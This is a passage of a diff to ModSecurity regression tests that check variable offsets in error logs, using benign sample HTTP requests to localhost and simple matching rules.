"expected":{ - "error_log":"o1,5v4,11t:trim" + "expected": { + "error_log": "o1,5v4,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule PATH_INFO \"index\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - QUERY_STRING", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - QUERY_STRING", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o7,6v16,41t:trim" + "expected": { + "error_log": "o7,6v16,41t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule QUERY_STRING \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_BASENAME", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_BASENAME", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o6,4v5,10t:trim" + "expected": { + "error_log": "o6,4v5,10t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BASENAME \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI_RAW", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI_RAW", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI_RAW \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS", - "request":{ - "headers":{ - "Content-Length": "27", - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,9v89,9t:trim" + "expected": { + "error_log": "o0,9v88,9t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"localhost\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS:content-type", - "request":{ - "headers":{ - "Content-Length": "27", - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS:content-type", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o14,3v163,33t:trim" + "expected": { + "error_log": "o14,3v162,33t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"www\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 1", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,5v162,5t:trim" + "expected": { + "error_log": "o0,5v161,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,5v79,5t:trim" + "expected": { + "error_log": "o0,5v79,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,4v64,13t:lowercase" + "expected": { + "error_log": "o0,4v64,13t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS_NAMES \"auth\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 1", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o1,2v216,3t:lowercase" + "expected": { + "error_log": "o1,2v215,3t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"es\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,1v223,1t:lowercase" + "expected": { + "error_log": "o0,1v222,1t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"z\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 3", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,1v228,1t:lowercase,t:trim" + "expected": { + "error_log": "o0,1v227,1t:lowercase,t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"b\" \"id:1,phase:2,pass,t:lowercase,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,1v226,1" + "expected": { + "error_log": "o0,1v225,1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES_NAMES \"t\" \"id:1,phase:2,pass,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REMOTE_USER", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"27", - "Content-Type":"application/x-www-form-urlencoded", + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REMOTE_USER", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpPcGVuU2VzYW1l" }, - "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", - "method":"GET" + "uri": "/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,7v198,30t:trim" + "expected": { + "error_log": "o0,7v197,30t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_USER \"Aladdin\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "516", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "516", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY_LENGTH", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY_LENGTH", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "516", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"v193,516t:trim" + "expected": { + "error_log": "v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY_LENGTH \"@gt 5\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/file?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "501", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/file?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1149,38 +1532,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,5v5,11t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,5v5,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/file\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 2", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "501", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1198,38 +1590,47 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,8v5,23t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,8v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_FILENAME \"/f i l e\" 